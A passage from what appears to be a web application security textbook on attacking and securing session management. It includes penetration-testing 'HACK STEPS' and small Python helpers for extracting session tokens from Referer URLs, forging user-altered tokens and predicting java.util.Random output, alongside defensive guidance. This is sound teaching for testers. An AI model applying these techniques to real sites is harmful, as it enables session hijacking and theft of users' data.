Some applications use HTTP for preauthenticated areas of the site,

such as the site’s front page, but switch to HTTPS from the login page

onwards. However, in many cases the user is issued a session token at

the first page visited, and this token is not modified when the user logs

in. The user’s session, which is originally unauthenticated, is upgraded

to an authenticated session after login. In this situation an eavesdropper

can intercept a user’s token before login, wait for the user’s communi-

cations to switch to HTTPS, indicating that the user is logging in, and

then attempt to access a protected page (such as My Account) using

that token.

■■

Even if the application issues a fresh token following successful login,

and uses HTTPS from the login page onwards, the token for the user’s

authenticated session may still be disclosed if the user revisits a preau-

thentication page (such as Help or About), either by following links

within the authenticated area, by using the Back button, or by typing

the URL directly.

■■

In a variation on the previous case, the application may attempt to

switch to HTTPS when the user clicks the Login link; however, it may

still accept a login over HTTP if the user modifies the URL accordingly.

In this situation, a suitably positioned attacker can modify the pages

returned in the preauthenticated areas of the site so that the Login link

points to an HTTP page. Even if the application issues a fresh session

token after successful login, the attacker may still intercept this token if

he has successfully downgraded the user’s connection to HTTP.

■■

Some applications use HTTP for all static content within the applica-

tion, such as images, scripts, style sheets, and page templates. This

behavior is often indicated by a warning alert within the user’s

browser, as shown in Figure 7-3. As described previously, an attacker

can intercept the user’s session token when the user’s browser accesses

a resource over HTTP, and use this token to access protected, nonstatic

areas of the site over HTTPS.

Figure 7-3: Browsers present a warning alert when a page accessed over HTTPS contains items accessed over HTTP.

■■

Even if an application uses HTTPS for every single page, including

unauthenticated areas of the site and static content, there may still be

circumstances in which users’ tokens are transmitted over HTTP. If an

attacker can somehow induce a user to make a request over HTTP

(either to the HTTP service on the same server if one is running or to

http://server:443/ otherwise), then their token may be submitted.

Means by which the attacker may attempt this include sending the user

a URL in an email or instant message, placing auto-loading links into a

web site the attacker controls, or using clickable banner ads. (See Chap-

ter 12 for more details about techniques of this kind for delivering

attacks against other users.)

HACK STEPS

■ Walk through the application in the normal way from first access (the

“start” URL), through the login process, and then through all of the appli-

cation’s functionality. Keep a record of every URL visited, and note every

instance in which a new session token is received. Pay particular attention

to login functions and transitions between HTTP and HTTPS communications.

This can be achieved manually using a network sniffer such as Wireshark, or

partially automated using the logging functions of your intercepting proxy.

■ If HTTP cookies are being used as the transmission mechanism for ses-

sion tokens, verify whether the secure flag is set, preventing them from

ever being transmitted over unencrypted connections.

■ Determine whether, in the normal use of the application, session tokens

are ever transmitted over an unencrypted connection. If so, they should

be regarded as vulnerable to interception.

■ Where the start page uses HTTP, and the application switches to HTTPS

for the login and authenticated areas of the site, verify whether a new

token is issued following login, or whether a token transmitted during

the HTTP stage is still being used to track the user’s authenticated ses-

sion. Also verify whether the application will accept login over HTTP if

the login URL is modified accordingly.

■ Even if the application uses HTTPS for every single page, verify whether

the server is also listening on port 80, running any service or content

whatsoever. If so, visit any HTTP URL directly from within an authenticated

session and verify whether the session token is transmitted.

■ In cases where a token for an authenticated session is transmitted to the

server over HTTP, verify whether that token continues to be valid or is

immediately terminated by the server.
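The check on the secure flag is easily scripted once the Set-Cookie headers have been logged. The following Python sketch parses the value of a single Set-Cookie header and reports whether the flag is present. The function names and sample header values are hypothetical, and the parsing is deliberately simple: it assumes attributes are separated by semicolons and that the first field is the cookie's name and value.

```python
def cookie_attributes(set_cookie_value):
    """Return the attributes of a Set-Cookie header value as a dictionary.

    The first field (name=value) is skipped, so a cookie whose value happens
    to be "secure" is not mistaken for one carrying the flag.
    """
    fields = [field.strip() for field in set_cookie_value.split(";")]
    attributes = {}
    for field in fields[1:]:
        if not field:
            continue
        name, _, value = field.partition("=")
        attributes[name.strip().lower()] = value.strip()
    return attributes


def has_secure_flag(set_cookie_value):
    """True if the cookie is marked for transmission over HTTPS only."""
    return "secure" in cookie_attributes(set_cookie_value)


print(has_secure_flag("JSESSIONID=F27ED2A6; Path=/; Secure; HttpOnly"))
print(has_secure_flag("JSESSIONID=F27ED2A6; Path=/"))
```

Run against every header captured during the walk-through, this quickly identifies which session cookies the browser would be willing to send over an unencrypted connection.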

Disclosure of Tokens in Logs

Aside from the clear-text transmission of session tokens in network communi-

cations, the most common place where tokens are simply disclosed to unau-

thorized view is in system logs of various kinds. Although it is a rarer

occurrence, the consequences of this kind of disclosure are usually more seri-

ous because those logs may be viewed by a far wider range of potential attack-

ers, and not just by someone who is suitably positioned to eavesdrop on the

network.

Many applications provide functionality for administrators and other sup-

port personnel to monitor and control aspects of the application’s runtime

state, including user sessions. For example, a helpdesk worker assisting a user

who is having problems may ask for their username, locate their current ses-

sion through a list or search function, and view relevant details about the ses-

sion. Or an administrator may consult a log of recent sessions in the course of

investigating a security breach. Often, this kind of monitoring and control

functionality discloses the actual session token associated with each session.

And often, the functionality is poorly protected, allowing unauthorized users

to access the list of current session tokens, and thereby hijack the sessions of all

application users.

The other main cause of session tokens appearing in system logs is where an

application uses the URL query string as a mechanism for transmitting tokens,

as opposed to using HTTP cookies or the body of POST requests. For example,

googling for inurl:jsessionid identifies thousands of applications that

transmit the Java platform session token (called jsessionid) within the URL:

http://www.webjunction.org/do/Navigation;jsessionid=F27ED2A6AAE4C6DA409A3044E79B8B48?category=327

When applications transmit their session tokens in this way, it is likely that

their session tokens will appear in various system logs to which unauthorized

parties may have access, for example:

■■

Users’ browser logs.

■■

Web server logs.

■■

Logs of corporate or ISP proxy servers.

■■

Logs of any reverse proxies employed within the application’s hosting

environment.

■■

The Referer logs of any servers that application users visit by following

off-site links, as in Figure 7-4.

Some of these vulnerabilities will arise even if HTTPS is used throughout

the application.

The final case just described presents an attacker with a highly effective

means of capturing session tokens in some applications. For example, if a web

mail application transmits session tokens within the URL, then an attacker can

send emails to users of the application containing a link to a web server that he

controls. If any user accesses the link (e.g., because they click on it, or because

their browser loads images contained within HTML-formatted email), then

the attacker will receive, in real time, the session token of the user. The attacker

can run a simple script on his server to hijack the session of every token

received and perform some malicious action, such as send spam email, harvest

personal information, or change passwords.
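The first stage of such a script is simply to pull the token out of each Referer value that arrives. A minimal Python sketch follows, using the URL format shown earlier. The function name is ours, and the pattern assumes the token is alphanumeric and carried in a jsessionid path parameter; other platforms use different parameter names and character sets.

```python
import re

# Assumption: the token is alphanumeric and follows ";jsessionid=" in the URL.
TOKEN_IN_URL = re.compile(r";jsessionid=([0-9A-Za-z]+)", re.IGNORECASE)


def token_from_referer(referer):
    """Return the session token embedded in a Referer URL, or None."""
    match = TOKEN_IN_URL.search(referer)
    return match.group(1) if match else None


referer = ("http://www.webjunction.org/do/Navigation;jsessionid="
           "F27ED2A6AAE4C6DA409A3044E79B8B48?category=327")
print(token_from_referer(referer))
print(token_from_referer("http://www.webjunction.org/do/Navigation?category=327"))
```

Each token recovered this way would then be substituted into requests to the target application, as described in the hack steps that follow.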

NOTE Current versions of Internet Explorer do not include a Referer header

when following off-site links contained in a page that was accessed over

HTTPS. In this situation, Firefox includes the Referer header provided that the

off-site link is also being accessed over HTTPS, even if it belongs to a different

domain. Hence, sensitive data placed into URLs is vulnerable to leakage in

Referer logs even where SSL is being used.

Figure 7-4: When session tokens appear in URLs, these will be transmitted in the Referer header when users follow an off-site link or their browser loads an off-site resource.

HACK STEPS

■ Identify all of the functionality within the application and locate any log-

ging or monitoring functions where session tokens can be viewed. Verify

who is able to access this functionality: for example, administrators, any

authenticated user, or any anonymous user. See Chapter 4 for techniques

for discovering hidden content that is not directly linked from the main

application.

■ Identify any instances within the application where session tokens are

transmitted within the URL. It may be that tokens are generally transmit-

ted in a more secure manner but that developers have used the URL in

specific cases to work around particular difficulties. For example, this

behavior is often observed where a web application interfaces to an

external system.

■ If session tokens are being transmitted in URLs, attempt to find any

application functionality that enables you to inject arbitrary off-site links

into pages viewed by other users — for example, functionality implement-

ing a message board, site feedback, question-and-answer, and so on. If

so, submit links to a web server you control and wait to see whether any

users’ session tokens are received in your Referer logs.

■ If any session tokens are captured, attempt to hijack user sessions by

using the application as normal but substituting a captured token for

your own. Some intercepting proxies can be configured with regex-based

content replacement rules to automatically modify items such as HTTP

cookies. If a large number of tokens are captured, and session hijacking

allows you to access sensitive data such as personal details, payment

information or user passwords, you can use the automated techniques

described in Chapter 13 to harvest all desired data belonging to other

application users.

Vulnerable Mapping of Tokens to Sessions

Various common vulnerabilities in session management mechanisms arise

because of weaknesses in the way the application maps the creation and pro-

cessing of session tokens to individual users’ sessions themselves.

The simplest weakness is to allow multiple valid tokens to be concurrently

assigned to the same user account. In virtually every application, there is no

legitimate reason why any user should have more than one session active at

any given time. Of course, it is fairly frequent for a user to abandon an active

session and start a new one — for example, because they have closed a

browser window or have moved to a different computer. But if a user appears

to be using two different sessions simultaneously, this usually indicates that a

security compromise has occurred: either the user has disclosed their creden-

tials to another party or an attacker has obtained their credentials through

some other means. In both cases, permitting concurrent sessions is undesirable

because it allows users to persist in undesirable practices without inconve-

nience and because it allows an attacker to use captured credentials without

risk of detection.

A related but distinct weakness is for applications to use “static” tokens.

These look like session tokens and may initially appear to function like them,

but in fact they are no such thing. In these applications, each user is assigned a

token, and this same token is reissued to the user every time he logs in. The

application always accepts the token as valid regardless of whether the user

has recently logged in and been issued with it. Applications like this really

involve a misunderstanding of the whole concept of what a session is, and the

benefits that it provides for managing and controlling access to the applica-

tion. Sometimes, applications operate like this as a means of implementing

poorly designed “remember me” functionality, and the static token is accord-

ingly stored in a persistent cookie (see Chapter 6). Sometimes the tokens them-

selves are vulnerable to prediction attacks, making the vulnerability far more

serious because rather than compromising the sessions of currently logged-in

users, a successful attack will compromise, for all time, the accounts of all reg-

istered users.

Other kinds of strange application behavior are also occasionally observed

that demonstrate a fundamental defect in the relationship between tokens and

sessions. One example is where a meaningful token is constructed based upon

a username and a random component. For example, consider the token:

dXNlcj1kYWY7cjE9MTMwOTQxODEyMTM0NTkwMTI=

which Base64-decodes to:

user=daf;r1=13094181213459012

After extensive analysis of the r1 component, we may conclude that this

cannot be predicted based on a sample of values. However, if the application’s

session processing logic is awry, it may be that an attacker simply needs to

submit any valid value as r1 and any valid value as user, in order to access a

session under the security context of the specified user. This is essentially an

access control vulnerability, because decisions about access are being made on

the basis of user-supplied data outside of the session (see Chapter 8). It arises

because the application effectively uses session tokens to signify that the

requester has established some kind of valid session with the application; how-

ever, the user context in which that session is processed is not an integral prop-

erty of the session itself but is determined per-request through some other

means. In this case, that means can be directly controlled by the requester.
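Testing for this condition means decoding a token we hold, changing only the user component, and re-encoding the result. The Python sketch below does this for the token format shown above. The function names and the target username are hypothetical, and the sketch assumes the decoded token is a semicolon-separated list of name=value pairs, as in the example.

```python
import base64


def decode_token(token):
    """Base64-decode a token into its name=value fields."""
    raw = base64.b64decode(token).decode("ascii")
    return dict(field.split("=", 1) for field in raw.split(";"))


def encode_token(fields):
    """Rebuild a token from its fields, preserving their order."""
    raw = ";".join(f"{name}={value}" for name, value in fields.items())
    return base64.b64encode(raw.encode("ascii")).decode("ascii")


def retarget(token, username):
    """Return a copy of `token` with only the user field changed."""
    fields = decode_token(token)
    fields["user"] = username
    return encode_token(fields)


original = "dXNlcj1kYWY7cjE9MTMwOTQxODEyMTM0NTkwMTI="
print(decode_token(original))
print(retarget(original, "admin"))
```

If the application accepts the modified token and serves pages in the context of the substituted user, the r1 component is validating that a session exists but is not binding that session to a user.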

HACK STEPS

■ Log in to the application twice using the same user account, either from

different browser processes or from different computers. Determine

whether both sessions remain active concurrently. If so, the application

supports concurrent sessions, enabling an attacker who has compro-

mised another user’s credentials to make use of these without risk of

detection.

■ Log in and log out several times using the same user account, either from

different browser processes or from different computers. Determine

whether a new session token is issued each time or whether the same

token is issued each time you log in. If the latter occurs, then the applica-

tion is not really employing proper sessions at all.

■ If tokens appear to contain any structure and meaning, attempt to sepa-

rate out components that may identify the user from those that appear to

be inscrutable. Try to modify any user-related components of the token

so that they refer to other known users of the application, and verify

whether the resulting token (a) is accepted by the application, and (b)

enables you to masquerade as that user.

Vulnerable Session Termination

Proper termination of sessions is important for two reasons. First, keeping the

lifespan of a session as short as is necessary reduces the window of opportu-

nity within which an attacker may capture, guess, or misuse a valid session

token. Second, it provides users with a means of invalidating an existing ses-

sion when they no longer require it, thereby enabling them to reduce this win-

dow further and to take some responsibility for securing their session in a

shared computing environment. The main weaknesses in session termination

functions involve failures to meet these two key objectives.

Some applications do not enforce effective session expiration. Once created, a

session may remain valid for many days after the last request is received, before

it is eventually cleaned up by the server. If tokens are vulnerable to some kind of

sequencing flaw that is particularly difficult to exploit (for example, requiring

100,000 guesses for each valid token identified), the long session lifetime means

an attacker may still be able to capture

the tokens of every user who has accessed the application in the recent past.

Some applications do not provide effective logout functionality:

■■

In some cases, a logout function is simply not implemented. Users have

no means of causing the application to invalidate their session.

■■

In some cases, the logout function does not actually cause the server to

invalidate the session. The server removes the token from the user’s

browser (for example, by issuing a Set-Cookie instruction to blank the

token). However, if the user continues to submit the token, then it is still

accepted by the server.

■■

In the worst cases, when a user clicks Logout, this fact is not communi-

cated to the server at all, and so the server performs no action whatso-

ever. Rather, a client-side script is executed that blanks the user’s

cookie, meaning that subsequent requests return the user to the login

page. An attacker who gains access to this cookie could use the session

as if the user had never logged out.

HACK STEPS

■ Do not fall into the trap of examining actions that the application per-

forms on the client-side token (such as cookie invalidation via a new

Set-Cookie instruction, client-side script, or an expiration time

attribute). In terms of session termination, nothing much depends upon

what happens to the token within the client browser. Rather, investigate

whether session expiration is implemented on the server side:

■

Wait for a period without using this token, and then submit a request

for a protected page (e.g., “my details”) using the token.

■

If the page is displayed as normal, then the token is still active.

■

Use trial and error to determine how long any session expiration time-

out is, or whether a token can still be used days after the last request

using it. Burp Intruder can be configured to increment the time inter-

val between successive requests, to automate this task.

■ Determine whether a logout function exists and is prominently made

available to users. If not, users are more vulnerable because they have

no means of causing the application to invalidate their session.

■ Where a logout function is provided, test its effectiveness. After logging

out, attempt to reuse the old token and determine whether it is still

valid. If so, users remain vulnerable to some session hijacking attacks

even after they have “logged out.”
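
The logout test above can be sketched against a toy application. This is a minimal illustration, not a real target: `ToyApp`, its methods, and the `invalidate_on_logout` switch are hypothetical names invented here to contrast client-side cookie blanking with genuine server-side invalidation.

```python
import secrets


class ToyApp:
    """Hypothetical in-memory application used only to illustrate the test."""

    def __init__(self, invalidate_on_logout):
        self.invalidate_on_logout = invalidate_on_logout
        self.sessions = {}  # token -> username, held on the server

    def login(self, username):
        token = secrets.token_hex(16)
        self.sessions[token] = username
        return token

    def logout(self, token):
        # A flawed implementation only tells the browser to blank its cookie
        # and leaves the server-side session record in place.
        if self.invalidate_on_logout:
            self.sessions.pop(token, None)
        return "Set-Cookie: sessionId=; path=/"

    def my_details(self, token):
        # Protected page: returns content only for a live session.
        user = self.sessions.get(token)
        return f"details for {user}" if user else None


def token_survives_logout(app, username):
    """Log in, log out, then replay the old token against a protected page."""
    token = app.login(username)
    app.logout(token)
    return app.my_details(token) is not None
```

Against a real application the same three steps would be performed through an intercepting proxy; what matters is the server's response to the replayed token, not what happened to the cookie in the browser.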

Client Exposure to Token Hijacking

There are various ways in which an attacker can target other users of the appli-

cation in an attempt to capture or misuse the victim’s session token:

■■

An obvious payload for cross-site scripting attacks is to query the user’s

cookies to obtain their session token, which can then be transmitted to

an arbitrary server controlled by the attacker. All of the various permu-

tations of this attack are described in detail in Chapter 12.

■■

Various other attacks against users can be used to hijack the user’s ses-

sion in different ways. These include session fixation vulnerabilities,

where an attacker feeds a known session token to a user, waits for them

to log in, and then hijacks their session; as well as cross-site request

forgery attacks, in which an attacker makes a crafted request to an

application from a web site that he controls, and exploits the fact that

the user’s browser automatically submits her current cookie with this

request. These attacks are also described in Chapter 12.

HACK STEPS

■ Identify any cross-site scripting vulnerabilities within the application and

determine whether these can be exploited to capture the session tokens

of other users (see Chapter 12).

■ If the application issues session tokens to unauthenticated users, obtain a

token and perform a login. If the application does not issue a fresh token

following a successful login, then it is vulnerable to session fixation.

■ Even if the application does not issue session tokens to unauthenticated

users, obtain a token by logging in, and then return to the login page. If

the application is willing to return this page even though you are already

authenticated, submit another login as a different user using the same

token. If the application does not issue a fresh token after the second

login, then it is vulnerable to session fixation.

■ Identify the format of session tokens used by the application. Modify

your token to an invented value that is validly formed, and attempt to

log in. If the application allows you to create an authenticated session

using an invented token, then it is vulnerable to session fixation.

■ If the application does not support login, but processes sensitive user

information (such as personal and payment details), and allows this to

be displayed after submission (e.g., on a “verify my order” page), then

carry out the previous three tests in relation to the pages displaying sen-

sitive data. If a token set during anonymous usage of the application can

later be used to retrieve sensitive user information, then the application

is vulnerable to session fixation.

■ If the application uses HTTP cookies to transmit session tokens, then it

may well be vulnerable to cross-site request forgery (XSRF). First, log in to

the application. Then confirm that a request made to the application but

originating from a page of a different application results in submission of

the user’s token. (This submission will need to be made from a window of

the same browser process as was used to log in to the target application.)

Attempt to identify any sensitive application functions all of whose para-

meters can be determined in advance by an attacker, and exploit this to

carry out unauthorized actions within the security context of a target user.

See Chapter 12 for more details on how to execute XSRF attacks.
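
The core of the session fixation checks above is a comparison of the token held before login with the token in use afterwards. The following is a minimal sketch under stated assumptions: `ToyLogin` and `regenerate_on_login` are hypothetical stand-ins for the application under test.

```python
import secrets


class ToyLogin:
    """Hypothetical application that hands out tokens before authentication."""

    def __init__(self, regenerate_on_login):
        self.regenerate_on_login = regenerate_on_login
        self.sessions = {}  # token -> username, or None while anonymous

    def anonymous_token(self):
        token = secrets.token_hex(16)
        self.sessions[token] = None
        return token

    def login(self, token, username):
        if self.regenerate_on_login:
            # Safe behavior: discard the pre-login token and issue a new one.
            self.sessions.pop(token, None)
            token = secrets.token_hex(16)
        self.sessions[token] = username
        return token


def vulnerable_to_fixation(app, username):
    """True if the pre-login token is still the session token after login."""
    before = app.anonymous_token()
    after = app.login(before, username)
    return after == before and app.sessions.get(before) == username
```

If the token is unchanged, an attacker who planted it in the victim's browser knows the identifier of the authenticated session.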

Liberal Cookie Scope

The usual simple summary of how cookies work is that the server issues a cookie using the HTTP response header Set-cookie, and the browser then resubmits this cookie in subsequent requests to the same server using the Cookie header. In fact, matters are rather more subtle than this.

The cookie mechanism allows a server to specify both the domain and the URL path to which each cookie will be resubmitted. To do this, it uses the domain and path attributes that may be included in the Set-cookie instruction.

Cookie Domain Restrictions

When the application residing at foo.wahh-app.com sets a cookie, the browser will by default resubmit the cookie in all subsequent requests to foo.wahh-app.com, and also to any subdomains, such as admin.foo.wahh-app.com. It will not submit the cookie to any other domains, including the parent domain wahh-app.com and any other subdomains of the parent, such as bar.wahh-app.com.

A server can override this default behavior by including a domain attribute in the Set-cookie instruction. For example, suppose that the application at foo.wahh-app.com returns the following HTTP header:

Set-cookie: sessionId=19284710; domain=wahh-app.com;

The browser will then resubmit this cookie to all subdomains of wahh-app.com, including bar.wahh-app.com.

NOTE A server cannot specify just any domain using this attribute. First, the

domain specified must be either the same domain as the application is running

on or a domain that is its parent (either immediately or at some remove).

Second, the domain specified cannot be a top-level domain such as .com or

.co.uk, because this would enable a malicious server to set arbitrary cookies

on any other domain. If the server violates one of these rules, the browser will

simply ignore the Set-cookie instruction.
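
The two rules in the note, together with the resubmission behavior for an explicit domain attribute, can be sketched as follows. This is an illustration only: the function names are invented here, and `REGISTRY_SUFFIXES` is a tiny stand-in for the much longer list of registry-controlled suffixes that a real browser consults.

```python
# Illustrative only: a tiny stand-in for the suffixes under which anyone
# can register names. Real browsers use a far longer list.
REGISTRY_SUFFIXES = {"com", "co.uk"}


def may_set_domain(origin_host, domain_attr):
    """Would a browser accept this domain attribute from this host?"""
    domain = domain_attr.lstrip(".").lower()
    host = origin_host.lower()
    if domain in REGISTRY_SUFFIXES:
        return False  # rule 2: top-level domains are refused
    # rule 1: the same domain, or a parent at any remove
    return host == domain or host.endswith("." + domain)


def sent_to(request_host, cookie_domain):
    """Is a cookie scoped to cookie_domain resubmitted to request_host?"""
    domain = cookie_domain.lstrip(".").lower()
    host = request_host.lower()
    return host == domain or host.endswith("." + domain)
```

Comparing against `"." + domain` rather than the bare string keeps an unrelated host such as `evil-wahh-app.com` from matching `wahh-app.com`.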

If an application sets a cookie’s domain scope too liberally, this may

expose the application to various security vulnerabilities.

For example, consider a blogging application located at the domain wahh-blogs.com that allows users to register. When users log in to the application, they receive a session token in a cookie that is scoped to this domain. Each user is able to create blogs that are accessed via a new subdomain prefixed by their username, for example:

herman.wahh-blogs.com

solero.wahh-blogs.com

Because cookies are automatically resubmitted to every subdomain within

their scope, when a user who is logged in browses the blogs of other users,

their session token will be submitted with their requests. If blog authors are

permitted to place arbitrary JavaScript within their own blogs (as is usually

the case in real-world blog applications), then a malicious blogger will be able

to steal the session tokens of other users in the same way as is done in a stored

cross-site scripting attack (see Chapter 12).

The problem arises because user-authored blogs are created as subdomains

of the main application that handles authentication and session management.

There is no facility within HTTP cookies for the application to prevent cookies

issued by the main domain from being resubmitted to its subdomains.

The solution is to use a different domain name for the main application (for example, www.wahh-blogs.com), and scope the domain of its session token cookies to this fully qualified name. The session cookie will not then be submitted when a logged-in user browses the blogs of other users.

A different version of this vulnerability arises when an application explicitly sets the domain scope of its cookies to a parent domain. For example, suppose that a security-critical application is located at the domain sensitiveapp.wahh-organization.com. When it sets cookies, it explicitly liberalizes their domain scope, as follows:

Set-cookie: sessionId=12df098ad809a5219; domain=wahh-organization.com

The consequence of this is that the sensitive application’s session token cookies will be submitted when a user visits any subdomain used by wahh-organization.com, including:

www.wahh-organization.com

testapp.wahh-organization.com

Although these other applications may all belong to the same organization

as the sensitive application, it is undesirable for the sensitive application’s

cookies to be submitted to other applications, for several reasons:

■■

The personnel responsible for the other applications may have a differ-

ent level of trust than those responsible for the sensitive application.

■■

The other applications may contain functionality which enables third

parties to obtain the value of cookies submitted to the application, as in

the previous blogging example.

■■

The other applications may not have been subjected to the same secu-

rity standards or testing as the sensitive application (e.g., because they

are less important, do not handle sensitive data, or have been created

only for test purposes). Many kinds of vulnerability that may exist in

those applications (for example, cross-site scripting vulnerabilities) may

be irrelevant to the security posture of those applications but could

enable an external attacker to leverage an insecure application in order

to capture session tokens created by the sensitive application.

Cookie Path Restrictions

When the application residing at /apps/secure/foo-app/index.jsp sets a cookie, the browser will by default resubmit the cookie in all subsequent requests to the path /apps/secure/foo-app/, and also to any subdirectories. It will not submit the cookie to the parent directory or to any other directory paths that exist on the server.

As with domain-based restrictions on cookie scope, a server can override this default behavior by including a path attribute in the Set-cookie instruction. For example, if the application returns the following HTTP header:

Set-cookie: sessionId=187ab023e09c00a881a; path=/apps/;

the browser will then resubmit this cookie to all subdirectories of the /apps/

path.

NOTE If the application specifies a path attribute that does not contain a

trailing slash, then the browser will not interpret this as representing an actual

directory. Rather it will submit the cookie to any paths that match the pattern

specified. For example, if the application specifies a path scope of /apps, then

the browser will submit its cookies to the paths /apps-test/ and /apps-

old/ and all of their subdirectories, in addition to the path /apps/. This

behavior is probably not what the developer intended.
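
The prefix behavior described in the note can be sketched as a plain string comparison. For contrast, the second function follows the path-match rule later standardized in RFC 6265 (section 5.1.4), which requires the prefix to end at a directory boundary. Browsers differ in which behavior they implement, so treat both functions as illustrations rather than as a description of any particular browser; the function names are invented here.

```python
def naive_prefix_match(request_path, cookie_path):
    """Plain string-prefix comparison, as described in the note above."""
    return request_path.startswith(cookie_path)


def rfc6265_path_match(request_path, cookie_path):
    """Path-match rule from RFC 6265, section 5.1.4, shown for contrast."""
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    # The prefix must end at a directory boundary.
    return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
```

When testing, it is worth checking empirically which behavior the browsers used by the application's users exhibit, because a scope of /apps is only exposed to /apps-test/ under the first rule.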

It is surprisingly common to encounter applications that explicitly liberalize the path scope of their cookies to the web server root (/). In this situation, the application’s cookies will be submitted to every application accessible via the same domain name. For example:

/apps/secure/bar-app/

/apps/test/

/blogs/users/solero/

Liberalizing a cookie’s path scope can leave an application vulnerable in the

same way as when an application sets the domain scope of a cookie to its par-

ent domain. If a security-critical application sets a cookie with its path scope

set to the web server root, and a less secure application resides at some other

path, then the cookies issued by the former application will be submitted to

the latter. This will enable an attacker to leverage any weakness in the less

secure application as a means of attacking sessions on the more secure target.

NOTE In certain circumstances it may be possible to circumvent cookie path restrictions, enabling a malicious web site residing at one path to access the cookies belonging to an application at a different path. Hence, the path attribute should not be relied upon as a security boundary. See the following paper by Amit Klein for more details:

www.webappsec.org/lists/websecurity/archive/2006-03/msg00000.html

HACK STEPS

Review all of the cookies issued by the application, and check for any domain

or path attributes used to control the scope of the cookies.

■ If an application explicitly liberalizes its cookies’ scope to a parent

domain or parent directory, then it may be leaving itself vulnerable to

attacks via other web applications.

■ If an application sets its cookies’ domain scope to its own domain name

(or does not specify a domain attribute), then it may still be exposed to

applications or functionality accessible via subdomains.

■ If an application specifies its cookies’ path scope without using a trailing

slash, then it might be exposed to other applications residing at paths

containing a prefix that matches the specified scope.

Identify all of the possible domain names and paths that will receive the

cookies issued by the application. Establish whether any other web application

or functionality is accessible via these domain names or paths that you may be

able to leverage to obtain the cookies issued to users of the target application.
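
The review described in these steps can be partly automated once the Set-cookie headers have been collected. The sketch below is a hypothetical helper, not part of any tool named in this chapter: it parses one header value by hand and reports the scope conditions listed above.

```python
def parse_set_cookie(header_value):
    """Split a Set-Cookie value into (name, value, attributes)."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, value, attrs


def scope_findings(app_host, app_path, header_value):
    """List scope-related observations for one cookie issued by the application."""
    name, _, attrs = parse_set_cookie(header_value)
    findings = []
    domain = attrs.get("domain", "").lstrip(".").lower()
    if domain and domain != app_host.lower():
        findings.append(f"{name}: domain liberalized to {domain}")
    path = attrs.get("path")
    if path is not None:
        if path != "/" and not path.endswith("/"):
            findings.append(f"{name}: path {path} has no trailing slash")
        if app_path.startswith(path) and path != app_path:
            findings.append(f"{name}: path liberalized to {path}")
    return findings
```

Each finding is only a prompt for the manual step that follows: enumerating what else is reachable within that domain or path scope.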

Securing Session Management

The defensive measures that web applications must take to prevent attacks on

their session management mechanisms correspond to the two broad cate-

gories of vulnerability that affect those mechanisms. In order to perform ses-

sion management in a secure manner, an application must generate its tokens

in a robust way and must protect these tokens throughout their lifecycle from

creation to disposal.

Generate Strong Tokens

The tokens used to re-identify a user between successive requests should be

generated in a manner that does not provide any scope for an attacker who

obtains a large sample of tokens from the application in the usual way to pre-

dict or extrapolate the tokens issued to other users.

The most effective token generation mechanisms are those that:

(a) use an extremely large set of possible values, and

(b) contain a strong source of pseudo-randomness, ensuring an even and

unpredictable spread of tokens across the range of possible values.

In principle, any item of arbitrary length and complexity may be guessed

using brute force given sufficient time and resources. The objective of design-

ing a mechanism for generating strong tokens is that it should be extremely

unlikely that a determined attacker with large amounts of bandwidth and pro-

cessing resources should be successful in guessing a single valid token within

the lifespan of its validity.

Tokens should consist of nothing more than an identifier used by the server

to locate the relevant session object to be used for processing the user’s

request. The token should contain no meaning or structure, either overtly or

wrapped in layers of encoding or obfuscation. All data about the session’s

owner and status should be stored on the server in the session object to which

the session token corresponds.

Care should be taken when selecting a source of randomness. Developers

should be aware that the various sources available to them are likely to differ

in strength very significantly. Some, such as java.util.Random, are perfectly

useful for many purposes where a source of changing input is required, but

can be extrapolated in both forward and reverse directions with perfect cer-

tainty on the basis of a single item of output. Developers should investigate

the mathematical properties of the actual algorithms used within different

available sources of randomness and should read relevant documentation

about the recommended uses of different APIs. In general, if an algorithm is

not explicitly described as being cryptographically secure, it should be

assumed to be predictable.
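
To make the predictability concrete, the following sketch models in Python the 48-bit linear congruential generator documented for java.util.Random and recovers its internal state from observed output. It is an illustration under assumptions: the class and function names are invented here, and the demonstration uses two consecutive 32-bit outputs, which is sufficient to brute-force the 16 hidden bits of state.

```python
MULTIPLIER = 0x5DEECE66D
ADDEND = 0xB
MASK = (1 << 48) - 1


class JavaRandomModel:
    """Python model of the 48-bit LCG documented for java.util.Random."""

    def __init__(self, seed):
        self.state = (seed ^ MULTIPLIER) & MASK  # initial scrambling

    def next_int(self):
        self.state = (self.state * MULTIPLIER + ADDEND) & MASK
        value = self.state >> 16                 # top 32 bits of the state
        return value - (1 << 32) if value >= (1 << 31) else value


def recover_state(first, second):
    """Find the state that produced `first`, using the output that followed."""
    high = (first & 0xFFFFFFFF) << 16
    for low in range(1 << 16):                   # only 16 bits are hidden
        state = high | low
        following = ((state * MULTIPLIER + ADDEND) & MASK) >> 16
        if following == (second & 0xFFFFFFFF):
            return state
    return None


def predict_next(first, second):
    """Predict the third output from two observed consecutive outputs."""
    state = recover_state(first, second)
    clone = JavaRandomModel(0)
    clone.state = (state * MULTIPLIER + ADDEND) & MASK  # state after `second`
    return clone.next_int()
```

The search covers only 65,536 candidates, which is why a generator of this kind offers no protection for session tokens regardless of how random its output appears.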

NOTE Some high-strength sources of randomness take some time to return

the next value in their output sequence because of the steps they take to

obtain sufficient entropy (from system events, etc.) and so may not deliver

values sufficiently fast to generate tokens for some high-volume applications.

In addition to selecting the most robust source of randomness that is feasi-

ble, a good practice is to introduce as a source of entropy some information

about the individual request for which the token is being generated. This

information may not be unique to that request, but it can be very effective in

mitigating any weaknesses in the core pseudo-random number generator

being used. Examples of information that may be incorporated include:

■■

The source IP address and port number from which the request was

received.

■■

The User-Agent header in the request.

■■

The time of the request in milliseconds.

A highly effective formula for incorporating this entropy is to construct a

string that concatenates a pseudo-random number, a variety of request-

specific data as listed, and a secret string known only to the server and gener-

ated afresh on each reboot. A suitable hash is then taken of this string (using,

for example, SHA-256 at the time of this writing), to produce a manageable

fixed-length string that can be used as a token. (Placing the most variable items

towards the start of the hash’s input serves to maximize the “avalanche” effect

within the hashing algorithm.)
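
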